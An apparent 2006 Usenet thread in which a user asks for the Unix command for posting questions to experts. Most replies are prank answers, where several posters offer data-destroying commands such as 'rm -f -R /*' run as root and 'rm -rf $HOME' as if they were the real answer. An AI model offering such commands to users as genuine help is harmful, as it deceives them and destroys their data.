    someone tell me what is the command?

    Thanks in advance;

    -Keal

    Jonay Aloat, Mar 12, 2006

  2. Jonay Aloat

    Ben Pope Guest

    Re: Unix command that can post question to a group of expert likeusing the newsgroup.

    Jonay Aloat wrote:
    > I know that I can use the news group to post questions. But last time, one
    > of my friend show me that you can do the same thing using a unix command. I
    > don't remember the command, but I know it is not "trn", or "archie". Can
    > someone tell me what is the command?

    not in comp.lang.c++

    followups set

    Ben Pope

    Ben Pope, Mar 12, 2006

  3. Jonay Aloat

    Dan C Guest

    On Sun, 12 Mar 2006 02:47:31 -0800, Jonay Aloat wrote:

    > I know that I can use the news group to post questions. But last time, one
    > of my friend show me that you can do the same thing using a unix command. I
    > don't remember the command, but I know it is not "trn", or "archie". Can
    > someone tell me what is the command?

    It's "format c: /u"

    Linux Registered User #327951

    Dan C, Mar 12, 2006
  4. On Sun, 12 Mar 2006 07:45:17 -0600, Dan C
    <> wrote:

    >On Sun, 12 Mar 2006 02:47:31 -0800, Jonay Aloat wrote:
    >
    >> I know that I can use the news group to post questions. But last time, one
    >> of my friend show me that you can do the same thing using a unix command. I
    >> don't remember the command, but I know it is not "trn", or "archie". Can
    >> someone tell me what is the command?

    >It's "format c: /u"

    But he wanted a UNIX command!
    Use this instead: "rm -f -R /* "

    --
    Bob Hairgrove

    Bob Hairgrove, Mar 12, 2006
  5. On Sun, 12 Mar 2006 15:26:51 +0100, Bob Hairgrove
    <> wrote:

    >On Sun, 12 Mar 2006 07:45:17 -0600, Dan C
    ><> wrote:
    >
    >>On Sun, 12 Mar 2006 02:47:31 -0800, Jonay Aloat wrote:
    >>
    >>> I know that I can use the news group to post questions. But last time, one
    >>> of my friend show me that you can do the same thing using a unix command. I
    >>> don't remember the command, but I know it is not "trn", or "archie". Can
    >>> someone tell me what is the command?

    >>It's "format c: /u"

    >But he wanted a UNIX command!
    >Use this instead: "rm -f -R /* "

    And be sure you have done "su" first!

    --
    Bob Hairgrove

    Bob Hairgrove, Mar 12, 2006
  6. Jonay Aloat

    Alex Buell Guest

    Re: Unix command that can post question to a group of expert likeusing the newsgroup.

    On Sun, 12 Mar 2006 15:28:11 +0100 Bob Hairgrove <>
    waved a wand and this message magically appeared:

    > >But he wanted a UNIX command!
    > >Use this instead: "rm -f -R /* "

    > And be sure you have done "su" first!

    This is even better: "rm -rf $HOME".

    --
    http://www.munted.org.uk

    "Honestly, what can I possibly say to get you into my bed?" - Anon.

    Alex Buell, Mar 13, 2006